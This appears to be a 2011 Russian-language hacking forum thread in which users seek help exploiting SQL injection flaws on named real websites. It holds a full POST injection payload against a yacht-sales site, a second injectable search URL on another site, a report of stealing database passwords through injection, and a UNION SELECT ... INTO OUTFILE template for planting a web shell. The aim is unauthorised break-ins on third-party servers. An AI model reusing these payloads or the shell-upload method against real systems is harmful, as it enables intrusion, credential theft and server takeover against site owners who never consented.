actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D 85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30 %26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=INJECTION&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30

тип БД - MSSQL

Описание проблемы


Там уязвимые поля имеют числовой тип в итоге чтобы туда я не писал сервер пытается сконвертить ответ в число что у него конечно не получается, вот и нашел другие параметры но в этих параметрах у меня не получается вызвать какую-либо реакцию, может быть у меня опять че-то замкнуло?

FlaktW
28.07.2011, 22:14
eclipse said:
Помогите раскрутить SQL inj
Уязвимая страница

Code:
http://www.allyachts.ru/YachtsSearch.asp?ret=2

POST запросом отсылаем

Code:
actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D 85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30 %26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=INJECTION&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30

тип БД - MSSQL
Описание проблемы


Эту скулю не раскрутить

eclipse
28.07.2011, 23:58
Эту скулю не раскрутить


С чего ты взял? Аргументируй пож.

plaeer
29.07.2011, 00:30
Всем привет. Нашёл скулю на одном сайтике, через её посмотрел конфиг с паролями от БД, но муадмин не нашёл. Пробовал через шелл законектится с другого хоста, безрезультатно. Что можно сделать? очень нужен там шелл.

winstrool
29.07.2011, 01:54
plaeer said:
Всем привет. Нашёл скулю на одном сайтике, через её посмотрел конфиг с паролями от БД, но муадмин не нашёл. Пробовал через шелл законектится с другого хоста, безрезультатно. Что можно сделать? очень нужен там шелл.


если через скуль прочитал файл то через нее же попробуй залить шелл, для этого тебе надо знать относительный путь сайта и найти директорию разрешенную для заливки файлов


*.php?id=-1 union select 'код шела или уплодера' into outfile '/путь до сайта с папкой разрешенной для заливки файлов/shell.php'+--+

mailbrush
29.07.2011, 02:13
Кинь сайт в ПМ.

eternal stud
29.07.2011, 11:30
Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start=0&full_search=0&result_from=1&result_num=20&story=admin&dosearch=admin&titleonly=0&searchuser=\'&exactname=yes&replyless=0&replylimit=0&searchdate=0&beforeafter=after&sortby=date&resorder=desc&showposts=0&catlist[]=0&doclear=admin

Заранее спасибо

Melfis
29.07.2011, 13:36
eternal stud said:
Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start=0&full_search=0&result_from=1&result_num=20&story=admin&dosearch=admin&titleonly=0&searchuser=\'&exactname=yes&replyless=0&replylimit=0&searchdate=0&beforeafter=after&sortby=date&resorder=desc&showposts=0&catlist[]=0&doclear=admin
Заранее спасибо


нет, ковычки либо слешируются, либо вырезаются(и не только кавычки). Все параметры, вставляющие в запрос к базе, обрамлены кавычками.